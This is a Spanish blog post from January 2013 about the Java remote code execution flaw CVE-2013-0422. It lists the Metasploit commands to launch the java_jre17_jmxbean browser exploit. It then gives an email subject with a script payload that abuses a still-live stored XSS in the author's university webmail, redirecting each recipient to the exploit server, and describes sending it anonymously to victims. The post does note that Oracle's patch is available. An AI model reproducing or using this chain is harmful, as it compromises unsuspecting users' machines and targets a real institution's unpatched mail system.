lunes, 14 de enero de 2013

Sobre Java, Metasploit y el retorno del XSS universitario

  Estos días Java ha vuelto a ser noticia y no para bien, pues se comentaba en los medios la existencia de una nueva vulnerabilidad 0-Day que permite ejecutar código de forma remota. Ha sido clasificada como CVE 2013-0422.

  Metasploit por su parte acaba de incluirla en su rama gratuita, así que probaremos que tal funciona sobre la última versión de java disponible, Java 7 Update 10 (a día de hoy 13/01/2013).

  Lo primero que he hecho ha sido actualizar el navegador y el plugin de java a las últimas versiones de cada uno:


 Para, acto seguido lanzar metasploit y ejecutar un msfupdate para tener nuestro framework a la última con el exploit de java en su base de datos.

Lo siguiente es escoger el exploit y configurarlo:
use exploit/multi/browser/java_jre17_jmxbean
Establecemos la IP del servidor (la nuestra):
set SRVHOST <IP>
el puerto:
set SRVPORT <puerto>
y lanzamos el exploit:
exploit

 En este momento el servidor se quedará esperando conexiones y nos ofrecerá una dirección que será la que las víctimas accederán.



¿Cómo difundimos el enlace?

  Como comenté hace tiempo en el post Los peligros de un XSS - Un ejemplo universitario: Ronda final existía en el correo de mi universidad una vulnerabilidad que ejecutaba un XSS al recibir un correo en la bandeja, simplemente con escribir código html/Javascript en el asunto de un correo (gracias señor @z050 por mostrarme la genial imagen ;) ).


  Dicha vulnerabilidad sigue estando vigente, y es perfecta para que un atacante la aprovechase, así que terminal en mano vamos a mandar un correo de forma ANÓNIMA a una víctima (o varias) con un asunto adaptado para tal magnifica ocasión:
Subject:<script>document.location="dirección_facilitada_por_metasploit"</script>

  Cada receptor del correo, será redirigido automáticamente a la dirección del servidor de Metasploit y éste hará su trabajo:



  Mención "especial" por decirlo de alguna manera a Google-Chrome que muestra una advertencia referente a un plugin de Java que quiere ejecutarse preguntándonos si lo permitimos o no. En el caso de IE y Firefox éstos callan como putas y son comprometidos.


NOTA: Los que uséis Links estad tranquilos, sois inmunes ;) .


Fuente / Más información


Actualización => Desde ayer (13/01/2013) existe un parche por parte de Oracle ("Update 11") que corrige el fallo, ACTUALIZAD!!


Y aquí cierro mi particular versión sobre la esta peligrosa vulnerabilidad relacionada con la ultima versión de Java, nos leemos en breve ;)


No hay comentarios:

Publicar un comentario